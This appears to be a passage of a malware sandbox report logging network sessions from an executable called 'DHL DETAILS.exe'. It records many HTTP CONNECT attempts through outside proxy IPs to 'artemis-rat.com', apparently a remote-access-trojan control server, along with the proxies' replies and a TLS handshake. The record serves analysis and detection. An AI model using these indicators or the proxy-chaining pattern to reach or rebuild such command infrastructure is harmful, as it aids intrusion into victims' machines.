Mar 9, 2024 13:14:15.483182907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.644088984 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
812	192.168.2.5	52524	45.227.193.166	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.483369112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.703857899 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
813	192.168.2.5	52680	162.241.6.97	45629	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.483683109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.067524910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
814	192.168.2.5	52547	52.67.10.183	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.483690023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.809869051 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:15 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
815	192.168.2.5	52363	122.114.232.137	808	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.486063004 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
816	192.168.2.5	52575	98.162.25.7	31653	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.488938093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
817	192.168.2.5	52541	167.172.86.46	10471	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.489191055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
818	192.168.2.5	52592	72.210.252.137	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.490087032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
819	192.168.2.5	52584	98.170.57.249	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.490104914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
820	192.168.2.5	52749	172.67.53.215	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.490753889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.644988060 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
821	192.168.2.5	50359	45.118.132.180	45449	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.491450071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
822	192.168.2.5	52762	192.154.244.92	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.492080927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
823	192.168.2.5	52757	184.169.154.119	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.492921114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.667004108 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:15 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:15.670845032 CET	369	OUT	Data Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 96 87 20 a5 a2 58 eb 30 97 a7 f6 1b 53 cf d5 c9 b6 04 92 47 ee 0e c5 53 0c c6 a3 39 7a 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: lheR X0SGS9z,+0/$#('=<5/artemis-rat.com#ZlyEc>3fevz+ej{yh(Z01\|h"*3\|
Mar 9, 2024 13:14:15.845057011 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 6e 0c 3b a0 88 64 cd 85 31 4a 35 c0 dd c0 a6 31 b1 ca 10 bc 91 8f a8 db 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9n;d1J51DOWNGRD0000H010Uartemis-rat.com0240309115509Z260309115509Z010Uartemis-rat.com0"0H0";dJJH
Mar 9, 2024 13:14:16.060262918 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 b5 88 9e be ee a3 b8 86 33 0e da c1 5f 5d 1a 44 1c 5e ff 82 15 df 46 a5 75 b8 26 91 ad 1b ff 1c 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 53 10 ce f5 e0 e1 d3 a2 c5 55 64 85 1f 5a 0f d1 08 d4 4b 6f d6 Data Ascii: %! 3_]D^Fu&(SUdZKoG0eLX1
Mar 9, 2024 13:14:16.233038902 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 b3 75 19 89 37 6d aa e9 84 52 0d 39 f8 ef f6 fa ee 1f 97 94 72 d7 05 66 1a 21 8a ec 25 bf a7 69 3e bc 53 92 a7 69 15 8f Data Ascii: (u7mR9rf!%i>Si

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
824	192.168.2.5	52694	198.12.255.193	53281	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.492922068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.067527056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.781347036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.102200031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.703676939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.270781040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.859888077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.045876980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
825	192.168.2.5	52744	192.163.200.196	59559	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.493892908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.973695993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.536968946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.724195957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.038845062 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.333203077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.630059004 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
826	192.168.2.5	52340	117.160.250.133	8899	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.498596907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.122714043 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
827	192.168.2.5	51647	184.178.172.14	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.498823881 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
828	192.168.2.5	50037	104.236.0.129	22167	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.500916958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.536457062 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.630309105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.630415916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
829	192.168.2.5	52793	104.20.75.132	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.508618116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.663219929 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
830	192.168.2.5	52781	159.65.77.168	8585	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.510991096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
831	192.168.2.5	52734	129.213.150.205	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.513973951 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
832	192.168.2.5	52606	121.128.194.154	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.516586065 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
833	192.168.2.5	52596	84.39.112.144	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.517543077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
834	192.168.2.5	51689	51.161.99.114	48235	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.523636103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.536533117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.630280972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
835	192.168.2.5	52686	70.166.167.38	57728	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.527796030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
836	192.168.2.5	49951	62.171.131.101	37447	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.531694889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.552400112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
837	192.168.2.5	52389	112.30.155.83	12792	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.532020092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.027978897 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
838	192.168.2.5	51619	47.106.112.207	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.535219908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.888032913 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.20.1 Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
839	192.168.2.5	52620	43.131.242.162	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
